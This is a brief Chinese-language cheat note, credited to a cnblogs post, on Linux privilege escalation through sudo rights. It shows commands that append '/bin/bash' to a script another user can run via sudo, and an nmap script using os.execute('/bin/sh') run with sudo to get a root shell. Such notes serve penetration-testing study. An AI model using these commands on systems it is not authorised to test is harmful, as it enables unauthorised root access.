查看当前用户可执行操作:sudo -l
1.如果是可执行另外一个用户下面的一个脚本,那么可以利用这个脚本来获取到那个用户的shell
例如:
那么执行
echo "/bin/bash" >> backups.sh #获取shell sudo -u jens ./backups.sh #利用jens用户自己来执行
即可切换至jens用户的shell,如果是root下面的话也是如此。
2.如果是可执行root用户下面的nmap的话,那么利用nmap脚本来执行弹shell的命令即可获取到root用户的shell。
例如:
利用:
echo ‘os.execute("/bin/sh")‘ > getShell sudo nmap --script=getShell
即可提权到root
原文:https://www.cnblogs.com/-chenxs/p/12060494.html